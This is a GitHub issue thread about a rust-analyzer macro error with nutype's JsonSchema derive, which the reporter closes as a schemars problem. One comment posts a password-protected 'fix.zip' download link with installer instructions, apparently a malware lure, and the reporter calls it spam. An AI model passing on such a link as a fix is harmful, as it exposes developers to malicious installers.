### ISSUE TITLE
Rust-analyzer lsp server now gives me macro error

### ISSUE THREAD

**Issue by miseyu** [greyblake/nutype#175]
## Overview
* Starting with this version, the following codes will generate an error
https://github.com/rust-lang/rust-analyzer/releases/tag/2024-08-26

```
unexpected token rust-analyzer[macro-error](https://rust-analyzer.github.io/manual.html#macro-error)
```

``` rust
#[nutype::nutype(
    sanitize(trim),
    derive(
        Debug,
        Clone,
        Eq,
        PartialEq,
        PartialOrd,
        Ord,
        AsRef,
        Serialize,
        Deserialize,
        Hash,
        Display,
        JsonSchema,
    )
)]
pub(super) struct EdgeId(String);
```

Removing the JsonSchema derive from the above resolves the problem, so there must be some problem at the JsonSchema point.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by miseyu** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

It looks like spam and I would like you to block it.

**Comment by miseyu** [comment]
This one was not a problem with nutype, but with https://github.com/GREsau/schemars, so I will close it.
